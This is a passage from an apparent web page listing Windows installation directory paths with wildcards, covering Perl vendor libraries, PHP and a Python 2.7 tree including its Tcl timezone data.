c:\Perl\perl\vendor\lib\Crypt\OpenPGP\Key\Public\*<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP\Key\Public<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP\Key\Secret\*<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP\Key\Secret<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP\Signature\*<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP\Signature<br />
c:\Perl\perl\vendor\lib\Crypt\Random\*<br />
c:\Perl\perl\vendor\lib\Crypt\Random<br />
c:\Perl\perl\vendor\lib\Crypt\Random\Provider\*<br />
c:\Perl\perl\vendor\lib\Crypt\Random\Provider<br />
c:\Perl\perl\vendor\lib\Crypt\RIPEMD160\*<br />
c:\Perl\perl\vendor\lib\Crypt\RIPEMD160<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\*<br />
c:\Perl\perl\vendor\lib\Crypt\RSA<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\ES\*<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\ES<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\Key\*<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\Key<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\Key\Private\*<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\Key\Private<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\Key\Public\*<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\Key\Public<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\SS\*<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\SS<br />
c:\Perl\perl\vendor\lib\Crypt\SSLeay\*<br />
c:\Perl\perl\vendor\lib\Crypt\SSLeay<br />
c:\Perl\perl\vendor\lib\Data\*<br />
c:\Perl\perl\vendor\lib\Data<br />
c:\Perl\perl\vendor\lib\Data\Compare\*<br />
c:\Perl\perl\vendor\lib\Data\Compare<br />
c:\Perl\perl\vendor\lib\Data\Compare\Plugins\*<br />
c:\Perl\perl\vendor\lib\Data\Compare\Plugins<br />
c:\Perl\perl\vendor\lib\Data\Compare\Plugins\Scalar\*<br />
c:\Perl\perl\vendor\lib\Data\Compare\Plugins\Scalar<br />
c:\Perl\perl\vendor\lib\Data\Random\*<br />
c:\Perl\perl\vendor\lib\Data\Random<br />
c:\Perl\perl\vendor\lib\DBD\*<br />
c:\Perl\perl\vendor\lib\DBD<br />
c:\Perl\perl\vendor\lib\DBD\ADO\*<br />
c:\Perl\perl\vendor\lib\DBD\ADO<br />
c:\Perl\perl\vendor\lib\DBD\File\*<br />
c:\Perl\perl\vendor\lib\DBD\File<br />
c:\Perl\perl\vendor\lib\DBD\Gofer\*<br />
c:\Perl\perl\vendor\lib\DBD\Gofer<br />
c:\Perl\perl\vendor\lib\DBD\Gofer\Policy\*<br />
c:\Perl\perl\vendor\lib\DBD\Gofer\Policy<br />
c:\Perl\perl\vendor\lib\DBD\Gofer\Transport\*<br />
c:\Perl\perl\vendor\lib\DBD\Gofer\Transport<br />
c:\Perl\perl\vendor\lib\DBD\mysql\*<br />
c:\Perl\perl\vendor\lib\DBD\mysql<br />
c:\Perl\perl\vendor\lib\DBD\ODBC\*<br />
c:\Perl\perl\vendor\lib\DBD\ODBC<br />
c:\Perl\perl\vendor\lib\DBD\SQLite\*<br />
c:\Perl\perl\vendor\lib\DBD\SQLite<br />
c:\Perl\perl\vendor\lib\DBI\*<br />
c:\Perl\perl\vendor\lib\DBI<br />
c:\Perl\perl\vendor\lib\DBI\Const\*<br />
c:\Perl\perl\vendor\lib\DBI\Const<br />
c:\Perl\perl\vendor\lib\DBI\Const\GetInfo\*<br />
c:\Perl\perl\vendor\lib\DBI\Const\GetInfo<br />
c:\Perl\perl\vendor\lib\DBI\DBD\*<br />
c:\Perl\perl\vendor\lib\DBI\DBD<br />
c:\Perl\perl\vendor\lib\DBI\DBD\SqlEngine\*<br />
c:\Perl\perl\vendor\lib\DBI\DBD\SqlEngine<br />
c:\Perl\perl\vendor\lib\DBI\Gofer\*<br />
c:\Perl\perl\vendor\lib\DBI\Gofer<br />
c:\Perl\perl\vendor\lib\DBI\Gofer\Serializer\*<br />
c:\Perl\perl\vendor\lib\DBI\Gofer\Serializer<br />
c:\Perl\perl\vendor\lib\DBI\Gofer\Transport\*<br />
c:\Perl\perl\vendor\lib\DBI\Gofer\Transport<br />
c:\Perl\perl\vendor\lib\DBI\ProfileDumper\*<br />
c:\Perl\perl\vendor\lib\DBI\ProfileDumper<br />
c:\Perl\perl\vendor\lib\DBI\SQL\*<br />
c:\Perl\perl\vendor\lib\DBI\SQL<br />
c:\Perl\perl\vendor\lib\DBI\Util\*<br />
c:\Perl\perl\vendor\lib\DBI\Util<br />
c:\Perl\perl\vendor\lib\DBIx\*<br />
c:\Perl\perl\vendor\lib\DBIx<br />
c:\Perl\perl\vendor\lib\DBIx\Simple\*<br />
c:\Perl\perl\vendor\lib\DBIx\Simple<br />
c:\Perl\perl\vendor\lib\DBIx\Simple\Result\*<br />
c:\Perl\perl\vendor\lib\DBIx\Simple\Result<br />
c:\Perl\perl\vendor\lib\DBM\*<br />
c:\Perl\perl\vendor\lib\DBM<br />
c:\Perl\perl\vendor\lib\DBM\Deep\*<br />
c:\Perl\perl\vendor\lib\DBM\Deep<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Engine\*<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Engine<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Iterator\*<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Iterator<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Iterator\File\*<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Iterator\File<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Sector\*<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Sector<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Sector\DBI\*<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Sector\DBI<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Sector\File\*<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Sector\File<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Storage\*<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Storage<br />
c:\Perl\perl\vendor\lib\Digest\*<br />
c:\Perl\perl\vendor\lib\Digest<br />
c:\Perl\perl\vendor\lib\File\*<br />
c:\Perl\perl\vendor\lib\File<br />
c:\Perl\perl\vendor\lib\File\Find\*<br />
c:\Perl\perl\vendor\lib\File\Find<br />
c:\Perl\perl\vendor\lib\File\Find\Rule\*<br />
c:\Perl\perl\vendor\lib\File\Find\Rule<br />
c:\Perl\perl\vendor\lib\File\HomeDir\*<br />
c:\Perl\perl\vendor\lib\File\HomeDir<br />
c:\Perl\perl\vendor\lib\File\HomeDir\Darwin\*<br />
c:\Perl\perl\vendor\lib\File\HomeDir\Darwin<br />
c:\Perl\perl\vendor\lib\GD\*<br />
c:\Perl\perl\vendor\lib\GD<br />
c:\Perl\perl\vendor\lib\HTML\*<br />
c:\Perl\perl\vendor\lib\HTML<br />
c:\Perl\perl\vendor\lib\HTTP\*<br />
c:\Perl\perl\vendor\lib\HTTP<br />
c:\Perl\perl\vendor\lib\HTTP\Cookies\*<br />
c:\Perl\perl\vendor\lib\HTTP\Cookies<br />
c:\Perl\perl\vendor\lib\HTTP\Headers\*<br />
c:\Perl\perl\vendor\lib\HTTP\Headers<br />
c:\Perl\perl\vendor\lib\HTTP\Request\*<br />
c:\Perl\perl\vendor\lib\HTTP\Request<br />
c:\Perl\perl\vendor\lib\Imager\*<br />
c:\Perl\perl\vendor\lib\Imager<br />
c:\Perl\perl\vendor\lib\Imager\Color\*<br />
c:\Perl\perl\vendor\lib\Imager\Color<br />
c:\Perl\perl\vendor\lib\Imager\Expr\*<br />
c:\Perl\perl\vendor\lib\Imager\Expr<br />
c:\Perl\perl\vendor\lib\Imager\File\*<br />
c:\Perl\perl\vendor\lib\Imager\File<br />
c:\Perl\perl\vendor\lib\Imager\Filter\*<br />
c:\Perl\perl\vendor\lib\Imager\Filter<br />
c:\Perl\perl\vendor\lib\Imager\Font\*<br />
c:\Perl\perl\vendor\lib\Imager\Font<br />
c:\Perl\perl\vendor\lib\Imager\include\*<br />
c:\Perl\perl\vendor\lib\Imager\include<br />
c:\Perl\perl\vendor\lib\IO\*<br />
c:\Perl\perl\vendor\lib\IO<br />
c:\Perl\perl\vendor\lib\IO\Compress\*<br />
c:\Perl\perl\vendor\lib\IO\Compress<br />
c:\Perl\perl\vendor\lib\IO\Compress\Adapter\*<br />
c:\Perl\perl\vendor\lib\IO\Compress\Adapter<br />
c:\Perl\perl\vendor\lib\IO\Socket\*<br />
c:\Perl\perl\vendor\lib\IO\Socket<br />
c:\Perl\perl\vendor\lib\IO\Uncompress\*<br />
c:\Perl\perl\vendor\lib\IO\Uncompress<br />
c:\Perl\perl\vendor\lib\IO\Uncompress\Adapter\*<br />
c:\Perl\perl\vendor\lib\IO\Uncompress\Adapter<br />
c:\Perl\perl\vendor\lib\IPC\*<br />
c:\Perl\perl\vendor\lib\IPC<br />
c:\Perl\perl\vendor\lib\IPC\Run3\*<br />
c:\Perl\perl\vendor\lib\IPC\Run3<br />
c:\Perl\perl\vendor\lib\IPC\System\*<br />
c:\Perl\perl\vendor\lib\IPC\System<br />
c:\Perl\perl\vendor\lib\JSON\*<br />
c:\Perl\perl\vendor\lib\JSON<br />
c:\Perl\perl\vendor\lib\JSON\backportPP\*<br />
c:\Perl\perl\vendor\lib\JSON\backportPP<br />
c:\Perl\perl\vendor\lib\JSON\PP\*<br />
c:\Perl\perl\vendor\lib\JSON\PP<br />
c:\Perl\perl\vendor\lib\JSON\XS\*<br />
c:\Perl\perl\vendor\lib\JSON\XS<br />
c:\Perl\perl\vendor\lib\lib\*<br />
c:\Perl\perl\vendor\lib\lib<br />
c:\Perl\perl\vendor\lib\lib\core\*<br />
c:\Perl\perl\vendor\lib\lib\core<br />
c:\Perl\perl\vendor\lib\local\*<br />
c:\Perl\perl\vendor\lib\local<br />
c:\Perl\perl\vendor\lib\LWP\*<br />
c:\Perl\perl\vendor\lib\LWP<br />
c:\Perl\perl\vendor\lib\LWP\Authen\*<br />
c:\Perl\perl\vendor\lib\LWP\Authen<br />
c:\Perl\perl\vendor\lib\LWP\Protocol\*<br />
c:\Perl\perl\vendor\lib\LWP\Protocol<br />
c:\Perl\perl\vendor\lib\Math\*<br />
c:\Perl\perl\vendor\lib\Math<br />
c:\Perl\perl\vendor\lib\Math\BigInt\*<br />
c:\Perl\perl\vendor\lib\Math\BigInt<br />
c:\Perl\perl\vendor\lib\Module\*<br />
c:\Perl\perl\vendor\lib\Module<br />
c:\Perl\perl\vendor\lib\Module\Plan\*<br />
c:\Perl\perl\vendor\lib\Module\Plan<br />
c:\Perl\perl\vendor\lib\Net\*<br />
c:\Perl\perl\vendor\lib\Net<br />
c:\Perl\perl\vendor\lib\Net\HTTP\*<br />
c:\Perl\perl\vendor\lib\Net\HTTP<br />
c:\Perl\perl\vendor\lib\Net\SMTP\*<br />
c:\Perl\perl\vendor\lib\Net\SMTP<br />
c:\Perl\perl\vendor\lib\Net\SSH2\*<br />
c:\Perl\perl\vendor\lib\Net\SSH2<br />
c:\Perl\perl\vendor\lib\Net\SSLeay\*<br />
c:\Perl\perl\vendor\lib\Net\SSLeay<br />
c:\Perl\perl\vendor\lib\Number\*<br />
c:\Perl\perl\vendor\lib\Number<br />
c:\Perl\perl\vendor\lib\PAR\*<br />
c:\Perl\perl\vendor\lib\PAR<br />
c:\Perl\perl\vendor\lib\PAR\Dist\*<br />
c:\Perl\perl\vendor\lib\PAR\Dist<br />
c:\Perl\perl\vendor\lib\PAR\Repository\*<br />
c:\Perl\perl\vendor\lib\PAR\Repository<br />
c:\Perl\perl\vendor\lib\PAR\Repository\Client\*<br />
c:\Perl\perl\vendor\lib\PAR\Repository\Client<br />
c:\Perl\perl\vendor\lib\Params\*<br />
c:\Perl\perl\vendor\lib\Params<br />
c:\Perl\perl\vendor\lib\Parse\*<br />
c:\Perl\perl\vendor\lib\Parse<br />
c:\Perl\perl\vendor\lib\Parse\Binary\*<br />
c:\Perl\perl\vendor\lib\Parse\Binary<br />
c:\Perl\perl\vendor\lib\Parse\Binary\FixedFormat\*<br />
c:\Perl\perl\vendor\lib\Parse\Binary\FixedFormat<br />
c:\Perl\perl\vendor\lib\Perl\*<br />
c:\Perl\perl\vendor\lib\Perl<br />
c:\Perl\perl\vendor\lib\POD2\*<br />
c:\Perl\perl\vendor\lib\POD2<br />
c:\Perl\perl\vendor\lib\POD2\DE\*<br />
c:\Perl\perl\vendor\lib\POD2\DE<br />
c:\Perl\perl\vendor\lib\POD2\DE\local\*<br />
c:\Perl\perl\vendor\lib\POD2\DE\local<br />
c:\Perl\perl\vendor\lib\POD2\PT_BR\*<br />
c:\Perl\perl\vendor\lib\POD2\PT_BR<br />
c:\Perl\perl\vendor\lib\POD2\PT_BR\local\*<br />
c:\Perl\perl\vendor\lib\POD2\PT_BR\local<br />
c:\Perl\perl\vendor\lib\PPM\*<br />
c:\Perl\perl\vendor\lib\PPM<br />
c:\Perl\perl\vendor\lib\PPM\XML\*<br />
c:\Perl\perl\vendor\lib\PPM\XML<br />
c:\Perl\perl\vendor\lib\Probe\*<br />
c:\Perl\perl\vendor\lib\Probe<br />
c:\Perl\perl\vendor\lib\SOAP\*<br />
c:\Perl\perl\vendor\lib\SOAP<br />
c:\Perl\perl\vendor\lib\SOAP\Lite\*<br />
c:\Perl\perl\vendor\lib\SOAP\Lite<br />
c:\Perl\perl\vendor\lib\SOAP\Lite\Deserializer\*<br />
c:\Perl\perl\vendor\lib\SOAP\Lite\Deserializer<br />
c:\Perl\perl\vendor\lib\SOAP\Transport\*<br />
c:\Perl\perl\vendor\lib\SOAP\Transport<br />
c:\Perl\perl\vendor\lib\Sort\*<br />
c:\Perl\perl\vendor\lib\Sort<br />
c:\Perl\perl\vendor\lib\String\*<br />
c:\Perl\perl\vendor\lib\String<br />
c:\Perl\perl\vendor\lib\Sub\*<br />
c:\Perl\perl\vendor\lib\Sub<br />
c:\Perl\perl\vendor\lib\Task\*<br />
c:\Perl\perl\vendor\lib\Task<br />
c:\Perl\perl\vendor\lib\Term\*<br />
c:\Perl\perl\vendor\lib\Term<br />
c:\Perl\perl\vendor\lib\Test\*<br />
c:\Perl\perl\vendor\lib\Test<br />
c:\Perl\perl\vendor\lib\Test\Deep\*<br />
c:\Perl\perl\vendor\lib\Test\Deep<br />
c:\Perl\perl\vendor\lib\Test\Deep\Cache\*<br />
c:\Perl\perl\vendor\lib\Test\Deep\Cache<br />
c:\Perl\perl\vendor\lib\Test\NoWarnings\*<br />
c:\Perl\perl\vendor\lib\Test\NoWarnings<br />
c:\Perl\perl\vendor\lib\Test\Tester\*<br />
c:\Perl\perl\vendor\lib\Test\Tester<br />
c:\Perl\perl\vendor\lib\Text\*<br />
c:\Perl\perl\vendor\lib\Text<br />
c:\Perl\perl\vendor\lib\Text\Diff\*<br />
c:\Perl\perl\vendor\lib\Text\Diff<br />
c:\Perl\perl\vendor\lib\Tie\*<br />
c:\Perl\perl\vendor\lib\Tie<br />
c:\Perl\perl\vendor\lib\Tree\*<br />
c:\Perl\perl\vendor\lib\Tree<br />
c:\Perl\perl\vendor\lib\UDDI\*<br />
c:\Perl\perl\vendor\lib\UDDI<br />
c:\Perl\perl\vendor\lib\URI\*<br />
c:\Perl\perl\vendor\lib\URI<br />
c:\Perl\perl\vendor\lib\URI\file\*<br />
c:\Perl\perl\vendor\lib\URI\file<br />
c:\Perl\perl\vendor\lib\URI\urn\*<br />
c:\Perl\perl\vendor\lib\URI\urn<br />
c:\Perl\perl\vendor\lib\Version\*<br />
c:\Perl\perl\vendor\lib\Version<br />
c:\Perl\perl\vendor\lib\Win32\*<br />
c:\Perl\perl\vendor\lib\Win32<br />
c:\Perl\perl\vendor\lib\Win32\API\*<br />
c:\Perl\perl\vendor\lib\Win32\API<br />
c:\Perl\perl\vendor\lib\Win32\Exe\*<br />
c:\Perl\perl\vendor\lib\Win32\Exe<br />
c:\Perl\perl\vendor\lib\Win32\Exe\Manifest\*<br />
c:\Perl\perl\vendor\lib\Win32\Exe\Manifest<br />
c:\Perl\perl\vendor\lib\Win32\Exe\PE\*<br />
c:\Perl\perl\vendor\lib\Win32\Exe\PE<br />
c:\Perl\perl\vendor\lib\Win32\Exe\PE\Header\*<br />
c:\Perl\perl\vendor\lib\Win32\Exe\PE\Header<br />
c:\Perl\perl\vendor\lib\Win32\Exe\Resource\*<br />
c:\Perl\perl\vendor\lib\Win32\Exe\Resource<br />
c:\Perl\perl\vendor\lib\Win32\Exe\ResourceEntry\*<br />
c:\Perl\perl\vendor\lib\Win32\Exe\ResourceEntry<br />
c:\Perl\perl\vendor\lib\Win32\Exe\Section\*<br />
c:\Perl\perl\vendor\lib\Win32\Exe\Section<br />
c:\Perl\perl\vendor\lib\Win32\File\*<br />
c:\Perl\perl\vendor\lib\Win32\File<br />
c:\Perl\perl\vendor\lib\Win32\OLE\*<br />
c:\Perl\perl\vendor\lib\Win32\OLE<br />
c:\Perl\perl\vendor\lib\Win32API\*<br />
c:\Perl\perl\vendor\lib\Win32API<br />
c:\Perl\perl\vendor\lib\Win32API\Registry\*<br />
c:\Perl\perl\vendor\lib\Win32API\Registry<br />
c:\Perl\perl\vendor\lib\WWW\*<br />
c:\Perl\perl\vendor\lib\WWW<br />
c:\Perl\perl\vendor\lib\WWW\RobotRules\*<br />
c:\Perl\perl\vendor\lib\WWW\RobotRules<br />
c:\Perl\perl\vendor\lib\XML\*<br />
c:\Perl\perl\vendor\lib\XML<br />
c:\Perl\perl\vendor\lib\XML\LibXML\*<br />
c:\Perl\perl\vendor\lib\XML\LibXML<br />
c:\Perl\perl\vendor\lib\XML\LibXML\SAX\*<br />
c:\Perl\perl\vendor\lib\XML\LibXML\SAX<br />
c:\Perl\perl\vendor\lib\XML\Parser\*<br />
c:\Perl\perl\vendor\lib\XML\Parser<br />
c:\Perl\perl\vendor\lib\XML\Parser\Encodings\*<br />
c:\Perl\perl\vendor\lib\XML\Parser\Encodings<br />
c:\Perl\perl\vendor\lib\XML\Parser\Style\*<br />
c:\Perl\perl\vendor\lib\XML\Parser\Style<br />
c:\Perl\perl\vendor\lib\XML\SAX\*<br />
c:\Perl\perl\vendor\lib\XML\SAX<br />
c:\Perl\perl\vendor\lib\XML\SAX\PurePerl\*<br />
c:\Perl\perl\vendor\lib\XML\SAX\PurePerl<br />
c:\Perl\perl\vendor\lib\XML\SAX\PurePerl\Reader\*<br />
c:\Perl\perl\vendor\lib\XML\SAX\PurePerl\Reader<br />
c:\Perl\perl\vendor\lib\XML\Simple\*<br />
c:\Perl\perl\vendor\lib\XML\Simple<br />
c:\Perl\perl\vendor\lib\XMLRPC\*<br />
c:\Perl\perl\vendor\lib\XMLRPC<br />
c:\Perl\perl\vendor\lib\XMLRPC\Transport\*<br />
c:\Perl\perl\vendor\lib\XMLRPC\Transport<br />
c:\Perl\perl\vendor\lib\YAML\*<br />
c:\Perl\perl\vendor\lib\YAML<br />
c:\Perl\perl\vendor\lib\YAML\Dumper\*<br />
c:\Perl\perl\vendor\lib\YAML\Dumper<br />
c:\Perl\perl\vendor\lib\YAML\Loader\*<br />
c:\Perl\perl\vendor\lib\YAML\Loader<br />
c:\Perl\ppm\*<br />
c:\Perl\ppm<br />
c:\Perl\win32\*<br />
c:\Perl\win32<br />
c:\PHP\*<br />
c:\PHP<br />
c:\PHP\dev\*<br />
c:\PHP\dev<br />
c:\PHP\ext\*<br />
c:\PHP\ext<br />
c:\Python27\*<br />
c:\Python27<br />
c:\Python27\DLLs\*<br />
c:\Python27\DLLs<br />
c:\Python27\Doc\*<br />
c:\Python27\Doc<br />
c:\Python27\include\*<br />
c:\Python27\include<br />
c:\Python27\Lib\*<br />
c:\Python27\Lib<br />
c:\Python27\Lib\bsddb\*<br />
c:\Python27\Lib\bsddb<br />
c:\Python27\Lib\bsddb\test\*<br />
c:\Python27\Lib\bsddb\test<br />
c:\Python27\Lib\compiler\*<br />
c:\Python27\Lib\compiler<br />
c:\Python27\Lib\ctypes\*<br />
c:\Python27\Lib\ctypes<br />
c:\Python27\Lib\ctypes\macholib\*<br />
c:\Python27\Lib\ctypes\macholib<br />
c:\Python27\Lib\ctypes\test\*<br />
c:\Python27\Lib\ctypes\test<br />
c:\Python27\Lib\curses\*<br />
c:\Python27\Lib\curses<br />
c:\Python27\Lib\distutils\*<br />
c:\Python27\Lib\distutils<br />
c:\Python27\Lib\distutils\command\*<br />
c:\Python27\Lib\distutils\command<br />
c:\Python27\Lib\distutils\tests\*<br />
c:\Python27\Lib\distutils\tests<br />
c:\Python27\Lib\email\*<br />
c:\Python27\Lib\email<br />
c:\Python27\Lib\email\mime\*<br />
c:\Python27\Lib\email\mime<br />
c:\Python27\Lib\email\test\*<br />
c:\Python27\Lib\email\test<br />
c:\Python27\Lib\email\test\data\*<br />
c:\Python27\Lib\email\test\data<br />
c:\Python27\Lib\encodings\*<br />
c:\Python27\Lib\encodings<br />
c:\Python27\Lib\hotshot\*<br />
c:\Python27\Lib\hotshot<br />
c:\Python27\Lib\idlelib\*<br />
c:\Python27\Lib\idlelib<br />
c:\Python27\Lib\idlelib\Icons\*<br />
c:\Python27\Lib\idlelib\Icons<br />
c:\Python27\Lib\importlib\*<br />
c:\Python27\Lib\importlib<br />
c:\Python27\Lib\json\*<br />
c:\Python27\Lib\json<br />
c:\Python27\Lib\json\tests\*<br />
c:\Python27\Lib\json\tests<br />
c:\Python27\Lib\lib-tk\*<br />
c:\Python27\Lib\lib-tk<br />
c:\Python27\Lib\lib-tk\test\*<br />
c:\Python27\Lib\lib-tk\test<br />
c:\Python27\Lib\lib-tk\test\test_tkinter\*<br />
c:\Python27\Lib\lib-tk\test\test_tkinter<br />
c:\Python27\Lib\lib-tk\test\test_ttk\*<br />
c:\Python27\Lib\lib-tk\test\test_ttk<br />
c:\Python27\Lib\lib2to3\*<br />
c:\Python27\Lib\lib2to3<br />
c:\Python27\Lib\lib2to3\fixes\*<br />
c:\Python27\Lib\lib2to3\fixes<br />
c:\Python27\Lib\lib2to3\pgen2\*<br />
c:\Python27\Lib\lib2to3\pgen2<br />
c:\Python27\Lib\lib2to3\tests\*<br />
c:\Python27\Lib\lib2to3\tests<br />
c:\Python27\Lib\lib2to3\tests\data\*<br />
c:\Python27\Lib\lib2to3\tests\data<br />
c:\Python27\Lib\lib2to3\tests\data\fixers\*<br />
c:\Python27\Lib\lib2to3\tests\data\fixers<br />
c:\Python27\Lib\lib2to3\tests\data\fixers\myfixes\*<br />
c:\Python27\Lib\lib2to3\tests\data\fixers\myfixes<br />
c:\Python27\Lib\logging\*<br />
c:\Python27\Lib\logging<br />
c:\Python27\Lib\msilib\*<br />
c:\Python27\Lib\msilib<br />
c:\Python27\Lib\multiprocessing\*<br />
c:\Python27\Lib\multiprocessing<br />
c:\Python27\Lib\multiprocessing\dummy\*<br />
c:\Python27\Lib\multiprocessing\dummy<br />
c:\Python27\Lib\pydoc_data\*<br />
c:\Python27\Lib\pydoc_data<br />
c:\Python27\Lib\site-packages\*<br />
c:\Python27\Lib\site-packages<br />
c:\Python27\Lib\site-packages\distorm3\*<br />
c:\Python27\Lib\site-packages\distorm3<br />
c:\Python27\Lib\site-packages\PIL\*<br />
c:\Python27\Lib\site-packages\PIL<br />
c:\Python27\Lib\site-packages\winappdbg\*<br />
c:\Python27\Lib\site-packages\winappdbg<br />
c:\Python27\Lib\site-packages\winappdbg\win32\*<br />
c:\Python27\Lib\site-packages\winappdbg\win32<br />
c:\Python27\Lib\sqlite3\*<br />
c:\Python27\Lib\sqlite3<br />
c:\Python27\Lib\sqlite3\test\*<br />
c:\Python27\Lib\sqlite3\test<br />
c:\Python27\Lib\test\*<br />
c:\Python27\Lib\test<br />
c:\Python27\Lib\test\cjkencodings\*<br />
c:\Python27\Lib\test\cjkencodings<br />
c:\Python27\Lib\test\crashers\*<br />
c:\Python27\Lib\test\crashers<br />
c:\Python27\Lib\test\decimaltestdata\*<br />
c:\Python27\Lib\test\decimaltestdata<br />
c:\Python27\Lib\test\leakers\*<br />
c:\Python27\Lib\test\leakers<br />
c:\Python27\Lib\test\subprocessdata\*<br />
c:\Python27\Lib\test\subprocessdata<br />
c:\Python27\Lib\test\tracedmodules\*<br />
c:\Python27\Lib\test\tracedmodules<br />
c:\Python27\Lib\test\xmltestdata\*<br />
c:\Python27\Lib\test\xmltestdata<br />
c:\Python27\Lib\unittest\*<br />
c:\Python27\Lib\unittest<br />
c:\Python27\Lib\unittest\test\*<br />
c:\Python27\Lib\unittest\test<br />
c:\Python27\Lib\wsgiref\*<br />
c:\Python27\Lib\wsgiref<br />
c:\Python27\Lib\xml\*<br />
c:\Python27\Lib\xml<br />
c:\Python27\Lib\xml\dom\*<br />
c:\Python27\Lib\xml\dom<br />
c:\Python27\Lib\xml\etree\*<br />
c:\Python27\Lib\xml\etree<br />
c:\Python27\Lib\xml\parsers\*<br />
c:\Python27\Lib\xml\parsers<br />
c:\Python27\Lib\xml\sax\*<br />
c:\Python27\Lib\xml\sax<br />
c:\Python27\libs\*<br />
c:\Python27\libs<br />
c:\Python27\Scripts\*<br />
c:\Python27\Scripts<br />
c:\Python27\tcl\*<br />
c:\Python27\tcl<br />
c:\Python27\tcl\dde1.3\*<br />
c:\Python27\tcl\dde1.3<br />
c:\Python27\tcl\reg1.2\*<br />
c:\Python27\tcl\reg1.2<br />
c:\Python27\tcl\tcl8\*<br />
c:\Python27\tcl\tcl8<br />
c:\Python27\tcl\tcl8\8.4\*<br />
c:\Python27\tcl\tcl8\8.4<br />
c:\Python27\tcl\tcl8\8.4\platform\*<br />
c:\Python27\tcl\tcl8\8.4\platform<br />
c:\Python27\tcl\tcl8\8.5\*<br />
c:\Python27\tcl\tcl8\8.5<br />
c:\Python27\tcl\tcl8.5\*<br />
c:\Python27\tcl\tcl8.5<br />
c:\Python27\tcl\tcl8.5\encoding\*<br />
c:\Python27\tcl\tcl8.5\encoding<br />
c:\Python27\tcl\tcl8.5\http1.0\*<br />
c:\Python27\tcl\tcl8.5\http1.0<br />
c:\Python27\tcl\tcl8.5\msgs\*<br />
c:\Python27\tcl\tcl8.5\msgs<br />
c:\Python27\tcl\tcl8.5\opt0.4\*<br />
c:\Python27\tcl\tcl8.5\opt0.4<br />
c:\Python27\tcl\tcl8.5\tzdata\*<br />
c:\Python27\tcl\tcl8.5\tzdata<br />
c:\Python27\tcl\tcl8.5\tzdata\Africa\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Africa<br />
c:\Python27\tcl\tcl8.5\tzdata\America\*<br />
c:\Python27\tcl\tcl8.5\tzdata\America<br />
c:\Python27\tcl\tcl8.5\tzdata\America\Argentina\*<br />
c:\Python27\tcl\tcl8.5\tzdata\America\Argentina<br />
c:\Python27\tcl\tcl8.5\tzdata\America\Indiana\*<br />
c:\Python27\tcl\tcl8.5\tzdata\America\Indiana<br />
c:\Python27\tcl\tcl8.5\tzdata\America\Kentucky\*<br />
c:\Python27\tcl\tcl8.5\tzdata\America\Kentucky<br />
c:\Python27\tcl\tcl8.5\tzdata\America\North_Dakota\*<br />
c:\Python27\tcl\tcl8.5\tzdata\America\North_Dakota<br />
c:\Python27\tcl\tcl8.5\tzdata\Antarctica\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Antarctica<br />
c:\Python27\tcl\tcl8.5\tzdata\Arctic\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Arctic<br />
c:\Python27\tcl\tcl8.5\tzdata\Asia\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Asia<br />
c:\Python27\tcl\tcl8.5\tzdata\Atlantic\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Atlantic<br />
c:\Python27\tcl\tcl8.5\tzdata\Australia\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Australia<br />
c:\Python27\tcl\tcl8.5\tzdata\Brazil\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Brazil<br />
c:\Python27\tcl\tcl8.5\tzdata\Canada\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Canada<br />
c:\Python27\tcl\tcl8.5\tzdata\Chile\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Chile<br />
c:\Python27\tcl\tcl8.5\tzdata\Etc\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Etc<br />
c:\Python27\tcl\tcl8.5\tzdata\Europe\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Europe<br />
c:\Python27\tcl\tcl8.5\tzdata\Indian\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Indian<br />
c:\Python27\tcl\tcl8.5\tzdata\Mexico\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Mexico<br />
c:\Python27\tcl\tcl8.5\tzdata\Pacific\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Pacific<br />
c:\Python27\tcl\tcl8.5\tzdata\SystemV\*<br />
c:\Python27\tcl\tcl8.5\tzdata\SystemV<br />
c:\Python27\tcl\tcl8.5\tzdata\US\*<br />
c:\Python27\tcl\tcl8.5\tzdata\US<br />
c:\Python27\tcl\tix8.4.3\*<br />
c:\Python27\tcl\tix8.4.3<br />
c:\Python27\tcl\tix8.4.3\bitmaps\*<br />
c:\Python27\tcl\tix8.4.3\bitmaps<br />
c:\Python27\tcl\tix8.4.3\demos\*<br />
c:\Python27\tcl\tix8.4.3\demos<br />
c:\Python27\tcl\tix8.4.3\demos\bitmaps\*<br />
c:\Python27\tcl\tix8.4.3\demos\bitmaps<br />
